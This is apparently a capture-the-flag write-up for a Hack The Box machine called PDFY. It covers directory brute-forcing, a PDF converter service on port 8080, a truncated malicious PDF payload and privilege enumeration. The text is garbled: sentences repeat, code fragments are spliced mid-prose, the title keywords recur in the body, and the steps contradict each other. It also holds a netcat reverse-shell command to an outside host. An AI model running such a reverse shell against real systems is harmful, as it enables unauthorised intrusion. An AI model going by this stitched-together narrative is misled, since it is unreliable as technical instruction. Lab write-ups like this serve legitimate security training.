Pdfy Htb Writeup Upd -

# Send the malicious file s.send(malicious_file.encode())

This writeup was updated to reflect changes made to the PDFY machine on Hack The Box. The machine was re-released with additional challenges and vulnerabilities, which were addressed in this updated writeup. Users are encouraged to revisit the machine and attempt to exploit it using the techniques described in this writeup.

Using DirBuster, we perform a directory brute-forcing attack on the web server and discover several directories, including /uploads , /download , and /admin . The /uploads directory seems to be used for storing user-uploaded files, while the /download directory appears to be used for downloading converted PDF files. pdfy htb writeup upd

As the pdfy user, we examine the user's groups and privileges. We notice that the user is a member of the pdfy group and has read/write access to the /var/www/pdfy directory. However, we also discover that the user has limited privileges and cannot execute system commands.

# Define the malicious file contents malicious_file = "JVBERi0xLjMK…(%PDF-1.3)…" # Send the malicious file s

We then focus our attention on the PDF converter service running on port 8080. After analyzing the service using tools like curl and burpsuite , we discover that it allows users to convert various file formats to PDF. However, we also notice that the service does not perform any validation on user-input files, which could potentially lead to code execution vulnerabilities.

Next, we perform a system enumeration using tools like linpeas and systemd-analyze . The results reveal that the machine uses a SystemD service called pdfy-converter to manage the PDF converter service on port 8080. Using DirBuster, we perform a directory brute-forcing attack

# Establish a reverse shell os.system('nc 10.10.14.12 4444 -e /bin/bash') After executing the exploit, we gain a reverse shell as the user pdfy . We then proceed to explore the machine and gather more information about the user and its privileges.